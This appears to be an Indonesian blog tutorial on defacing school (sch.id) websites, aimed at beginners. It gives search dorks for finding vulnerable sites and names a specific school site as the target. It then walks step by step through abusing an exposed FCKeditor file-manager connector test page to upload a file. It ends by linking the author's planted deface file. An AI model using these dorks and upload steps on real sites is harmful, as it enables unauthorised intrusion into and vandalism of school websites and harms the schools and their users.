Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi. Hal ini bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si defacer. Deface merupakan sebuah serangan yang dilakukan untuk mengganti visual dari sebuah website. Para hacker biasanya meninggalkan pesan dan nickname mereka agar hasil kerjanya diketahui oleh khalayak hacker.
DEFACE DENGAN FILE UPLOAD INI SANGAT MUDAH DAN DIPERUNTUKAN UNTUK NEWBIE ATAU PEMULA YANG INGIN MENDEFACE WEBSITE SEKOLAH(SCH.ID)
BAHAN:
1. Notepad (Script Deface)
2.Dork
Langkah Kerja :
1. Berikut Dork yang akan kita cari
Dork:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
saya memilih dork inurl:/html/siswa.php? . Nanti akan muncul web untuk ditebas.Pilih salah satu webnya
2. Jika anda sudah memilah. Target saya Seperti Ini Oke langsung saja
http://smaplusbanyuasin.sch.id//html/siswa.php?id=prestasi
3. Exploit dengan /editor/filemanager/connectors/test.html
Contoh : http://smaplusbanyuasin.sch.id/editor/filemanager/connectors/test.html lalu Enter
4. Tampilannya akan berubah Akan tampil fck editor "Kalo tidak tampil/error cari site yang lain"
5. Pada kolom Connector ubahlah *ASP menjadi *PHP, terus pada kolom Resource Type ganti menjadi File
6. Upload file anda yang berbentuk .txt kalo berhasil ada tanda File Uploaded With No Error
7. Setelah file ter-upload. Kita cari file kita dengan exploit /userfiles/file/namafileanda.txt
dan ini hasil deface nya http://smaplusbanyuasin.sch.id//userfiles/image/ilham17%281%29.jpg
Semoga Anda berhasil!! Karna Cara Ini Sangat Mudah
Tunggu Artikel Tentang deface selanjutnya ya........
Jika ada kesalah atau ada yang kurang dan Kurang mengerti
Mohon komenya
0 komentar:
Posting Komentar